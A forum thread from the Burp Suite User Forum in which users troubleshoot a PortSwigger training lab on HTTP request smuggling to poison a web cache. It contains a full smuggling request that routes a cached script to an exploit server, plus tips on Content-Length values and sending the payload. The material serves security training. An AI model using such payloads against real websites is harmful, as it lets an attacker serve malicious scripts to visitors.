Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

nergal | Last updated: Aug 20, 2021 10:19PM UTC

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch browser because in the web cache poisoning labs also had problems with that. Am i doing something wrong? I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: victimhost Connection: close

Alex, PortSwigger Agent | Last updated: Aug 23, 2021 04:13PM UTC

Hi, Thanks for your post. You may need to repeat the POST/GET process several times before the attack succeeds. It might also be worth disabling any extensions and retrying the lab - in case there are any conflicting options. Thanks

nergal | Last updated: Aug 23, 2021 06:54PM UTC

I repeated it several times trying to get it but still nothing. I also did use a Chrome browser without extensions, a Mozilla Firefox, Chromium in both windows and Linux. Still dont getting it

nergal | Last updated: Aug 24, 2021 03:05AM UTC

Ok. I did it. I was searching for help in some other channel and some friend told me to intercept the request to send the "exploit" instead of using the repeater. That way i just had to send it once and it work at the first shot. Anyway, thank you for your time!

Alex, PortSwigger Agent | Last updated: Aug 24, 2021 07:47AM UTC

Hi, Thanks for the update, glad to hear you solved the lab!

Viren | Last updated: Sep 12, 2021 12:36PM UTC

user 193 instead of 185 in Content-Length header count (it probably due to some new format of the exploit server domains added 8 additional characters with the “exploit-“ prefix)

kairosdev | Last updated: Sep 16, 2021 09:15AM UTC

Thanks Viren. I think Portswigger Staff should announce this changes. Otherwise, it's a waste of time trying to figure out how to make it work. Change the solution paragraph on the lab.

Ben, PortSwigger Agent | Last updated: Sep 17, 2021 08:32AM UTC

Hi, Thank you for letting us know about this. We will take a look and discuss this with the Web Academy team.

Ben, PortSwigger Agent | Last updated: Oct 20, 2021 08:54AM UTC

Hi all, Just to confirm, we have now made the change to the solution of this lab (as discussed above) so that it states the correct Content-Length value to use now that we are prefixing the Exploit Server URLs with 'exploit-'.

Sean | Last updated: Dec 23, 2021 12:43AM UTC